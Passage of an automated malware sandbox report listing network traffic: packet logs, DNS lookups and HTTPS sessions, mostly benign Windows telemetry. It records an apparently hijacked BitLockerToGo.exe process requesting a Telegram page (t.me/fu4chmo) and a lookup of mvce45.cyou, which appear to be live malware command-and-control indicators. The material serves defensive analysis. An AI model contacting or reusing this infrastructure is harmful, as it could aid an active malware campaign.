                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.517457962 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.517566919 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.549479008 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.550561905 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551011086 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551420927 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.558058977 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.558537960 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.832984924 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833005905 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833018064 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833029985 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833040953 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833513975 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.833820105 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.857778072 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.860636950 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.876243114 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.185802937 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.186278105 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.513165951 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.514573097 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.515752077 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:51.519896984 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.872714043 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:53.872905016 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.198740959 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.199589968 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.199769020 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:54.203047037 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.461879969 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.462723970 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.464083910 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.464459896 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.783420086 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.784708023 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.785270929 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.785470009 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.789294958 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.789906979 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.790467024 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.791479111 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:56.791757107 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.844719887 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.885166883 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:05.233570099 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:05.259784937 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:13.875360966 CET4435380223.44.203.16192.168.2.8

                                                                                                                                                                                                                                                                                                                  ICMP Packets

                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:34.801794052 CET192.168.2.81.1.1.1c29c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.989897013 CET192.168.2.81.1.1.1c243(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:49.664091110 CET192.168.2.81.1.1.10x50f6Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.051379919 CET192.168.2.81.1.1.10x13b1Standard query (0)mvce45.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:17.146729946 CET192.168.2.81.1.1.10x279Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:17.146850109 CET192.168.2.81.1.1.10xa213Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:30.672641993 CET192.168.2.81.1.1.10x3fafStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:30.672931910 CET192.168.2.81.1.1.10x695fStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.412941933 CET192.168.2.81.1.1.10xd34dStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.413132906 CET192.168.2.81.1.1.10x9e9cStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.631732941 CET192.168.2.81.1.1.10x1ae3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.631907940 CET192.168.2.81.1.1.10xe2deStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.632596016 CET192.168.2.81.1.1.10x3356Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.632760048 CET192.168.2.81.1.1.10xdd95Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.654954910 CET192.168.2.81.1.1.10x21f8Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.655122042 CET192.168.2.81.1.1.10x1303Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.749192953 CET192.168.2.81.1.1.10xa54fStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.749413013 CET192.168.2.81.1.1.10x76fbStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.756046057 CET192.168.2.81.1.1.10x46bdStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.756198883 CET192.168.2.81.1.1.10x8418Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.929450035 CET192.168.2.81.1.1.10xfddaStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.929609060 CET192.168.2.81.1.1.10xb478Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.032187939 CET192.168.2.81.1.1.10x1685Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.032330990 CET192.168.2.81.1.1.10x2a03Standard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:49.908555031 CET1.1.1.1192.168.2.80x50f6No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:47:52.587873936 CET1.1.1.1192.168.2.80x13b1No error (0)mvce45.cyou49.13.32.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:17.286825895 CET1.1.1.1192.168.2.80x279No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:17.286850929 CET1.1.1.1192.168.2.80xa213No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:30.912483931 CET1.1.1.1192.168.2.80x695fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:30.916830063 CET1.1.1.1192.168.2.80x3fafNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.370450020 CET1.1.1.1192.168.2.80x88caNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.370450020 CET1.1.1.1192.168.2.80x88caNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:31.472835064 CET1.1.1.1192.168.2.80x56d1No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.647730112 CET1.1.1.1192.168.2.80x9e9cNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:33.662452936 CET1.1.1.1192.168.2.80xd34dNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.171911001 CET1.1.1.1192.168.2.80x6cebNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.171911001 CET1.1.1.1192.168.2.80x6cebNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.769146919 CET1.1.1.1192.168.2.80xe2deNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792397976 CET1.1.1.1192.168.2.80x21f8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792397976 CET1.1.1.1192.168.2.80x21f8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.792860031 CET1.1.1.1192.168.2.80x1303No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.869188070 CET1.1.1.1192.168.2.80xdd95No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.871967077 CET1.1.1.1192.168.2.80x3356No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.871967077 CET1.1.1.1192.168.2.80x3356No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873042107 CET1.1.1.1192.168.2.80x1ae3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.873042107 CET1.1.1.1192.168.2.80x1ae3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.890120029 CET1.1.1.1192.168.2.80xa54fNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.894457102 CET1.1.1.1192.168.2.80x8418No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:35.894709110 CET1.1.1.1192.168.2.80x46bdNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.170242071 CET1.1.1.1192.168.2.80xfddaNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.172148943 CET1.1.1.1192.168.2.80x2a03No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.172238111 CET1.1.1.1192.168.2.80x1685No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.174755096 CET1.1.1.1192.168.2.80xb478No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.189399958 CET1.1.1.1192.168.2.80xb2f9No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.189399958 CET1.1.1.1192.168.2.80xb2f9No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.338376045 CET1.1.1.1192.168.2.80xfe92No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.338376045 CET1.1.1.1192.168.2.80xfe92No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.663975000 CET1.1.1.1192.168.2.80x90c0No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:37.663975000 CET1.1.1.1192.168.2.80x90c0No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.239820004 CET1.1.1.1192.168.2.80xfbcbNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.239820004 CET1.1.1.1192.168.2.80xfbcbNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.278629065 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.278629065 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.294099092 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.294099092 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.300604105 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.300604105 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.312470913 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.312470913 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.321873903 CET1.1.1.1192.168.2.80x8b7fNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:47.321873903 CET1.1.1.1192.168.2.80x8b7fNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                  • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                                                                                  • mvce45.cyou
                                                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                                                  • fs.microsoft.com
                                                                                                                                                                                                                                                                                                                  • login.live.com
                                                                                                                                                                                                                                                                                                                  • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                                                    • assets2.msn.com
                                                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  • edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  • data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                  • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

                                                                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  0192.168.2.84971052.149.20.212443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:25 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:25 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                  MS-CorrelationId: 0908f55d-e881-4a9a-b674-345536c08dfe
                                                                                                                                                                                                                                                                                                                  MS-RequestId: 7060e7d6-d5ce-4a85-be77-5baf8b680049
                                                                                                                                                                                                                                                                                                                  MS-CV: RR866FoqG0CAM4AO.0
                                                                                                                                                                                                                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:47:25 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 24490
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  1192.168.2.849711149.154.167.994437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:51 UTC86OUTGET /fu4chmo HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:47:51 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:47:51 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Content-Length: 12314
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=fbd8ea196c06cb7d16_1201143984790985881; expires=Fri, 22 Nov 2024 14:47:51 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
